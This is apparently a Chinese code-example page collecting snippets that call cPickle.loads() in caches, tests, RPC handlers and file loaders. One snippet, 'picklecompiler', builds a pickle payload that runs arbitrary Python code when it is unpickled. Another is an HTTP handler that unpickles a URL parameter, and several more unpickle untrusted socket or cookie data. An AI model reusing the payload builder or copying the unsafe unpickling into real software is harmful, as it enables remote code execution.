我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用cPickle.loads()。
def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256): """ Return the content of a cookie. To read a `Signed Cookie`, the `secret` must match the one used to create the cookie (see :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing cookie or wrong signature), return a default value. """ value = self.cookies.get(key) if secret: # See BaseResponse.set_cookie for details on signed cookies. if value and value.startswith('!') and '?' in value: sig, msg = map(tob, value[1:].split('?', 1)) hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest() if _lscmp(sig, base64.b64encode(hash)): dst = pickle.loads(base64.b64decode(msg)) if dst and dst[0] == key: return dst[1] return default return value or default
def read_pytable(h5f, group=None): if group is None: group = h5f.root data = AttrDict() for child in h5f.list_nodes(group): item = None try: if isinstance(child, tb.group.Group): item = read_pytable(h5f, child) else: item = child.read() if isinstance(item, str) and item.startswith('OBJ_'): item = cPickle.loads(item[4:]) data[child._v_name] = item except tb.NoSuchNodeError: warnings.warn('No such node: "%s", skipping...' % repr(child)) pass return data
def read(self, group=None): if group is None: group = self.h5f.root data = AttrDict() for child in self.h5f.list_nodes(group): item = None try: if isinstance(child, tb.group.Group): item = self.read(child) else: item = child.read() if isinstance(item, str) and item.startswith('OBJ_'): item = cPickle.loads(item[4:]) data[child._v_name] = item except tb.NoSuchNodeError: warnings.warn('No such node: "%s", skipping...' %repr(child)) pass return data
def _testStruct(self, Struct, values = {}, delattrs = ()): schema = mapped_struct.Schema.from_typed_slots(Struct) x = Struct() for k in delattrs: delattr(x, k) for k,v in values.iteritems(): setattr(x, k, v) px = schema.pack(x) old_schema = schema schema = cPickle.loads(cPickle.dumps(schema, 2)) self.assertTrue(old_schema.compatible(schema)) self.assertTrue(schema.compatible(old_schema)) dx = schema.unpack(px) for k in Struct.__slots__: if k in values or k not in delattrs: self.assertEquals(getattr(dx, k, None), getattr(x, k, None)) else: self.assertFalse(hasattr(dx, k))
def testPackPickleUnpack(self): # hack - unregister subschema (can't register twice) mapped_struct.mapped_object.TYPE_CODES.pop(self.SubStruct,None) mapped_struct.mapped_object.OBJ_PACKERS.pop('}',None) for TEST_VALUES in self.TEST_VALUES: # re-register subschema mapped_struct.mapped_object.register_schema(self.SubStruct, self.subschema, '}') x = self.Struct(**{k:v for k,v in TEST_VALUES.iteritems()}) pschema = cPickle.dumps(self.schema) # Unregister schema to force the need for auto-register mapped_struct.mapped_object.TYPE_CODES.pop(self.SubStruct,None) mapped_struct.mapped_object.OBJ_PACKERS.pop('}',None) pschema = cPickle.loads(pschema) dx = pschema.unpack(self.schema.pack(x)) for k,v in TEST_VALUES.iteritems(): self.assertTrue(hasattr(dx, k)) self.assertEqual(getattr(dx, k), v) for k in self.Struct.__slots__: if k not in TEST_VALUES: self.assertFalse(hasattr(dx, k))
def load_object(self, value): """The reversal of :meth:`dump_object`. This might be called with None. """ if value is None: return None if value.startswith(b'!'): try: return pickle.loads(value[1:]) except pickle.PickleError: return None try: return int(value) except ValueError: # before 0.8 we did not have serialization. Still support that. return value
def recv(self): 'Receive one object.' self.__recv.acquire() try: while '\0' not in self.__temp: temp = self.__sock.recv(2 ** 12) if not temp: if self.__temp: raise IOError else: raise EOFError self.__temp += temp temp, self.__temp = self.__temp.split('\0', 1) finally: self.__recv.release() return _cPickle.loads(_base255.decode(temp)) ################################################################################
def cache(key_prefix, timeout=300): """ Decorator for caching functions. Returns the function value from cache, or the function if cache disabled """ if timeout is None: timeout = 300 def decorator(f): @wraps(f) def wrapper(*args, **kwargs): key = "%s::%s" % (settings.REDIS_KEYPREFIX, key_prefix) if os.environ.get('PYBOSSA_REDIS_CACHE_DISABLED') is None: output = sentinel.slave.get(key) if output: return pickle.loads(output) output = f(*args, **kwargs) sentinel.master.setex(key, timeout, pickle.dumps(output)) return output output = f(*args, **kwargs) sentinel.master.setex(key, timeout, pickle.dumps(output)) return output return wrapper return decorator
def testOldPickles(self): # Ensure that applications serializing pytz instances as pickles # have no troubles upgrading to a new pytz release. These pickles # where created with pytz2006j east1 = pickle.loads(_byte_string( "cpytz\n_p\np1\n(S'US/Eastern'\np2\nI-18000\n" "I0\nS'EST'\np3\ntRp4\n." )) east2 = pytz.timezone('US/Eastern') self.assertTrue(east1 is east2) # Confirm changes in name munging between 2006j and 2007c cause # no problems. pap1 = pickle.loads(_byte_string( "cpytz\n_p\np1\n(S'America/Port_minus_au_minus_Prince'" "\np2\nI-17340\nI0\nS'PPMT'\np3\ntRp4\n.")) pap2 = pytz.timezone('America/Port-au-Prince') self.assertTrue(pap1 is pap2) gmt1 = pickle.loads(_byte_string( "cpytz\n_p\np1\n(S'Etc/GMT_plus_10'\np2\ntRp3\n.")) gmt2 = pytz.timezone('Etc/GMT+10') self.assertTrue(gmt1 is gmt2)
def load_weights(fname, params): # params = lasagne.layers.get_all_params(l_out,trainable=True)+[log_sigma]+[x for x in lasagne.layers.get_all_params(l_out) if x.name[-4:]=='mean' or x.name[-7:]=='inv_std'] names = [ par.name for par in params ] if len(names)!=len(set(names)): raise ValueError('need unique param names') param_dict = np.load(fname) for param in params: if param.name in param_dict: stored_shape = np.asarray(param_dict[param.name].shape) param_shape = np.asarray(param.get_value().shape) if not np.all(stored_shape == param_shape): warn_msg = 'shape mismatch:' warn_msg += '{} stored:{} new:{}'.format(param.name, stored_shape, param_shape) warn_msg += ', skipping' warnings.warn(warn_msg) else: param.set_value(param_dict[param.name]) else: logging.warn('unable to load parameter {} from {}'.format(param.name, fname)) if 'metadata' in param_dict: metadata = pickle.loads(str(param_dict['metadata'])) else: metadata = {} return metadata
def testNonIdentityHash(self): global ClassWithCustomHash class ClassWithCustomHash(styles.Versioned): def __init__(self, unique, hash): self.unique = unique self.hash = hash def __hash__(self): return self.hash v1 = ClassWithCustomHash('v1', 0) v2 = ClassWithCustomHash('v2', 0) pkl = pickle.dumps((v1, v2)) del v1, v2 ClassWithCustomHash.persistenceVersion = 1 ClassWithCustomHash.upgradeToVersion1 = lambda self: setattr(self, 'upgraded', True) v1, v2 = pickle.loads(pkl) styles.doUpgrade() self.assertEquals(v1.unique, 'v1') self.assertEquals(v2.unique, 'v2') self.failUnless(v1.upgraded) self.failUnless(v2.upgraded)
def testUpgradeDeserializesObjectsRequiringUpgrade(self): global ToyClassA, ToyClassB class ToyClassA(styles.Versioned): pass class ToyClassB(styles.Versioned): pass x = ToyClassA() y = ToyClassB() pklA, pklB = pickle.dumps(x), pickle.dumps(y) del x, y ToyClassA.persistenceVersion = 1 def upgradeToVersion1(self): self.y = pickle.loads(pklB) styles.doUpgrade() ToyClassA.upgradeToVersion1 = upgradeToVersion1 ToyClassB.persistenceVersion = 1 ToyClassB.upgradeToVersion1 = lambda self: setattr(self, 'upgraded', True) x = pickle.loads(pklA) styles.doUpgrade() self.failUnless(x.y.upgraded)
def ListTableColumns(self, table): """Return a list of columns in the given table. [] if the table doesn't exist. """ assert isinstance(table, str) if contains_metastrings(table): raise ValueError, "bad table name: contains reserved metastrings" columnlist_key = _columns_key(table) if not getattr(self.db, "has_key")(columnlist_key): return [] pickledcolumnlist = getattr(self.db, "get_bytes", self.db.get)(columnlist_key) if pickledcolumnlist: return pickle.loads(pickledcolumnlist) else: return []
def picklecompiler(sourcefile): """ Usually pickle can only be used to (de)serialize objects. This tiny snippet will allow you to transform arbitrary python source code into a pickle string. Unpickling this string with pickle.loads() will execute the given soruce code. The trick is actually prettey easy: Usually eval() will only accept expressions, thus class and function declarations does not work. Using the work-around of code objects (returned by compile()), we can execute real python source code :) """ sourcecode = file(sourcefile).read() payload = "c__builtin__\neval\n(c__builtin__\ncompile\n(%sS'<payload>'\nS'exec'\ntRtR." % (pickle.dumps( sourcecode )[:-4],) print payload fp =open("poc.pickle","w") fp.write(payload)
def do_GET(self): if "?payload" in self.path: query= urllib.splitquery(self.path) action = query[1].split('=')[1] print action action = urllib.unquote(action) print action try: x = cPickle.loads(action) #string argv content = "command executed" except Exception,e: print e content = e else: content = "hello World" self.send_response(200) self.send_header("Content-type","text/html") self.end_headers() self.wfile.write("<html>") self.wfile.write(" %s " % content) self.wfile.write("</html>")
def members(self, name, count=1, with_all=False): """set srandmember command :return set members """ count = abs(count) name = str(name) result = None try: if with_all: result = self.__smembers(name) # return set else: result = self.__srandmember(name, count) # return list except: # Compatible for low version redis result = self.__srandmember(name) # return one value if result is None: return None if isinstance(result, list) or isinstance(result, set): return [self.loads(i) for i in result] return [self.loads(result)]
def load(F): """ Wrapper around ``cPickle.load`` which accepts either a file-like object or a filename. Parameters ---------- F : str or file The file or file name to load. See Also -------- dump : Pickle an array Notes ----- This is different from `numpy.load`, which does not use cPickle but loads the NumPy binary .npy format. """ if not hasattr(F, 'readline'): F = open(F, 'r') return pickle.load(F)
def loads(strg): """ Load a pickle from the current string. The result of ``cPickle.loads(strg)`` is returned. Parameters ---------- strg : str The string to load. See Also -------- dumps : Return a string corresponding to the pickling of a masked array. """ return pickle.loads(strg)
def on_evaluation_request(self, ch, method, props, body): """Callback for messages in the 'rpc_evaluations_queue' They say: "Hey, here are the execution results" """ # This is the "remote procedure" # being called and returning a value ev_mutation_object = pickle.loads(body) self.process_execution_results(ev_mutation_object) ch.basic_publish(exchange = '', routing_key = props.reply_to, properties = pika.BasicProperties( correlation_id = props.correlation_id), body = 'EVALUATION RECEIVED') ch.basic_ack(delivery_tag = method.delivery_tag)
def read_logs(self): try: while True: datagram = self.socket.recv(8192) chunk = datagram[0:4] struct.unpack(">L", chunk)[0] chunk = datagram[4:] obj = cPickle.loads(chunk) record = logging.makeLogRecord(obj) if (record.levelno >= self.level): logger = logging.getLogger(record.name) logger.handle(record) except Exception as e: print "ERROR: " + str(e) finally: self.socket.close()
def test_text_dataset(): with temporary_content_path(TEST_TEXT) as path: dataset = TextDataset(path, 100) stream = dataset.get_example_stream() it = stream.get_epoch_iterator() d = next(it) assert d == (['abc', 'abc', 'def'],) pickled_it = cPickle.dumps(it) d = next(it) assert d == (['def', 'def', 'xyz'],) it = cPickle.loads(pickled_it) d = next(it) assert d == (['def', 'def', 'xyz'],) d = next(it) assert d == (['xyz'],)
def load_object(self, value): """The reversal of :meth:`dump_object`. This might be callde with None. """ if value is None: return None if value.startswith(b'!'): try: return pickle.loads(value[1:]) except pickle.PickleError: return None try: return int(value) except ValueError: # before 0.8 we did not have serialization. Still support that. return value
def get(self, key, timeout=None): """Given a key, returns an element from the redis table""" key = self.pre_identifier + key # Check to see if we have this key unpickled_entry = self.client.get(key) if not unpickled_entry: # No hit, return nothing return None entry = pickle.loads(unpickled_entry) # Use provided timeout in arguments if provided # otherwise use the one provided during init. if timeout is None: timeout = self.timeout # Make sure entry is not expired if self._is_expired(entry, timeout): # entry expired, delete and return nothing self.delete_entry(key) return None # entry found and not expired, return it return entry[1]
def tpn_test_iterator(track_path): """ return values: x: list of tracks """ temp_res = None tracks = [] # zipfile if zipfile.is_zipfile(track_path): zf = zipfile.ZipFile(track_path) track_list = zf.namelist() # print "Loading {} tracks...".format(len(track_list)) for track_name in track_list: tracks.append(cPickle.loads(zf.read(track_name))) zf.close() # folders elif osp.isdir(track_path): track_list = sorted(glob.glob(osp.join(track_path, '*'))) # print "Loading {} tracks...".format(len(track_list)) for track_name in track_list: tracks.append(cPickle.loads(open(track_name, 'rb').read())) else: raise NotImplementedError('Only zipfile and directories are supported.') return tracks
def _loadJson(cls, filename): jsonFh = open(filename, "r") jsonDb = json.load(jsonFh) jsonFh.close() db = cls() backRefTables = [] for tableName, b64PickledTable in jsonDb.iteritems(): pickledTable = base64.b64decode(b64PickledTable) table = pickle.loads(pickledTable) if tableName == "_backRefTables": backRefTables = table continue setattr(db, tableName, table) for tableName in backRefTables: getattr(db, tableName).setDatabase(db) for tableName, table in db.__dict__.iteritems(): table = cls._loadJsonTableTransform(db, tableName, table) setattr(db, tableName, table) return db
def __GetResourceValuesFromReadResponse(self, response, path, resourceType): values = None if resourceType == AwaResourceType.StringArray: values = pickle.loads(self._xmlrpcSession.AwaServerReadResponse_GetValuesAsStringArrayPointer(response, path, None)) elif resourceType == AwaResourceType.IntegerArray: values = pickle.loads(self._xmlrpcSession.AwaServerReadResponse_GetValuesAsIntegerArrayPointer(response, path, None)) elif resourceType == AwaResourceType.FloatArray: values = pickle.loads(self._xmlrpcSession.AwaServerReadResponse_GetValuesAsFloatArrayPointer(response, path, None)) elif resourceType == AwaResourceType.BooleanArray: values = pickle.loads(self._xmlrpcSession.AwaServerReadResponse_GetValuesAsBooleanArrayPointer(response, path, None)) elif resourceType == AwaResourceType.OpaqueArray: values = pickle.loads(self._xmlrpcSession.AwaServerReadResponse_GetValuesAsOpaqueArrayPointer(response, path, None)) elif resourceType == AwaResourceType.TimeArray: values = pickle.loads(self._xmlrpcSession.AwaServerReadResponse_GetValuesAsTimeArrayPointer(response, path, None)) elif resourceType == AwaResourceType.ObjectLinkArray: values = pickle.loads(self._xmlrpcSession.AwaServerReadResponse_GetValuesAsObjectLinkArrayPointer(response, path, None)) else: raise AwaInvalidArgumentException("Invalid resource type", resourceType) #CheckSuccess(error, "Failed to retrieve values on path %s" % (path, )) return values
def __GetResourceValuesFromGetResponse(self, response, path, resourceType): values = None if resourceType == AwaResourceType.StringArray: values = pickle.loads(self._xmlrpcSession.AwaClientGetResponse_GetValuesAsStringArrayPointer(response, path, None)) elif resourceType == AwaResourceType.IntegerArray: values = pickle.loads(self._xmlrpcSession.AwaClientGetResponse_GetValuesAsIntegerArrayPointer(response, path, None)) elif resourceType == AwaResourceType.FloatArray: values = pickle.loads(self._xmlrpcSession.AwaClientGetResponse_GetValuesAsFloatArrayPointer(response, path, None)) elif resourceType == AwaResourceType.BooleanArray: values = pickle.loads(self._xmlrpcSession.AwaClientGetResponse_GetValuesAsBooleanArrayPointer(response, path, None)) elif resourceType == AwaResourceType.OpaqueArray: values = pickle.loads(self._xmlrpcSession.AwaClientGetResponse_GetValuesAsOpaqueArrayPointer(response, path, None)) elif resourceType == AwaResourceType.TimeArray: values = pickle.loads(self._xmlrpcSession.AwaClientGetResponse_GetValuesAsTimeArrayPointer(response, path, None)) elif resourceType == AwaResourceType.ObjectLinkArray: values = pickle.loads(self._xmlrpcSession.AwaClientGetResponse_GetValuesAsObjectLinkArrayPointer(response, path, None)) else: raise AwaInvalidArgumentException("Invalid resource type", resourceType) #CheckSuccess(error, "Failed to retrieve values on path %s" % (path, )) return values
def retry_until_success(self, msg, times): stop = False while not stop: self.internal_channel.send_first_internal_channel_message(msg) rep_msg = self.internal_channel.wait_int_message(dont_wait=False) if not (rep_msg == NOK or rep_msg == DIE): rep_msg = loads(rep_msg) if times == 2: # not necessary self.update_birth_information(rep_msg) stop = True else: self.logger.debug("wrong information at sync time, retry in 0.5 seconds") time.sleep(0.5)
def deserialize(pkl): return pickle.loads(pkl)
def cookie_decode(data, key, digestmod=None): """ Verify and decode an encoded string. Return an object or None.""" depr(0, 13, "cookie_decode() will be removed soon.", "Do not use this API directly.") data = tob(data) if cookie_is_encoded(data): sig, msg = data.split(tob('?'), 1) digestmod = digestmod or hashlib.sha256 hashed = hmac.new(tob(key), msg, digestmod=digestmod).digest() if _lscmp(sig[1:], base64.b64encode(hashed)): return pickle.loads(base64.b64decode(msg)) return None
def value_decode(self, val): # This could raise an exception! return loads( _unquote(val) ), val
def value_decode(self, val): strval = _unquote(val) try: return loads(strval), val except: return strval, val
def reshape(self, bottom, top): while self.redis.llen(config.solver_prototxt) == 0: print 'waiting for spider...', self.redis.llen(config.solver_prototxt) time.sleep(0.2) self.item = cPickle.loads(self.redis.lpop(config.solver_prototxt)) item = self.item for i in range(len(item)): top[i].reshape(*item[i].shape)
def unpack(self, item): if isinstance(item, np.ndarray): return item elif isinstance(item, str) and item.startswith('OBJ_'): return cPickle.loads(item[4:]) else: raise ValueError('Unknown type written to pytables')
def unpicklechops(string): """base64decodes and unpickes it's argument string into chops""" return loads(zlib.decompress(base64.decodestring(string)))
def testPackPickleUnpack(self): for TEST_VALUES in self.TEST_VALUES: x = self.Struct(**{k:v for k,v in TEST_VALUES.iteritems()}) pschema = cPickle.loads(cPickle.dumps(self.schema)) dx = pschema.unpack(self.schema.pack(x)) for k,v in TEST_VALUES.iteritems(): self.assertTrue(hasattr(dx, k)) self.assertEqual(getattr(dx, k), v) for k in self.Struct.__slots__: if k not in TEST_VALUES: self.assertFalse(hasattr(dx, k))
def __init__(self, buf, offset = 0, idmap = None, idmap_size = 1024): if idmap is None: idmap = Cache(idmap_size) self.offset = offset if offset != 0: self.buf = buf = buffer(buf, offset) else: self.buf = buf self.total_size, self.index_offset, self.index_elements = self._Header.unpack_from(buf, 0) self.index = numpy.frombuffer(buf, offset = self.index_offset, dtype = numpy.uint64, count = self.index_elements) self.idmap = idmap if self.index_elements > 0 and self.index[0] >= (self._Header.size + self._NewHeader.size): # New version, most likely self.version, min_reader_version, self.schema_offset, self.schema_size = self._NewHeader.unpack_from( buf, self._Header.size) if self._CURRENT_VERSION < min_reader_version: raise ValueError(( "Incompatible buffer, this buffer needs a reader with support for version %d at least, " "this reader supports up to version %d") % ( min_reader_version, self._CURRENT_VERSION )) if self.schema_offset and self.schema_size: if self.schema_offset > len(buf) or (self.schema_size + self.schema_offset) > len(buf): raise ValueError("Corrupted input - bad schema location") stored_schema = cPickle.loads(bytes(buffer(buf, self.schema_offset, self.schema_size))) if not isinstance(stored_schema, Schema): raise ValueError("Corrupted input - unrecognizable schema") if self.schema is None or not self.schema.compatible(stored_schema): self.schema = stored_schema elif self.schema is None: raise ValueError("Cannot map schema-less buffer without specifying schema") elif self.index_elements > 0: raise ValueError("Cannot reliably map version-0 buffers")
def _handle_serialization(func): def wrapped(session, params): params = pickle.loads(params['params']) rv = func(session, *params['args'], **params['kwargs']) return pickle.dumps(rv) return wrapped
def call_plugin_serialized(self, plugin, fn, *args, **kwargs): params = {'params': pickle.dumps(dict(args=args, kwargs=kwargs))} rv = self.call_plugin(plugin, fn, params) return pickle.loads(rv)
def get(self, key): try: expires, value = self._cache[key] if expires == 0 or expires > time(): return pickle.loads(value) except (KeyError, pickle.PickleError): return None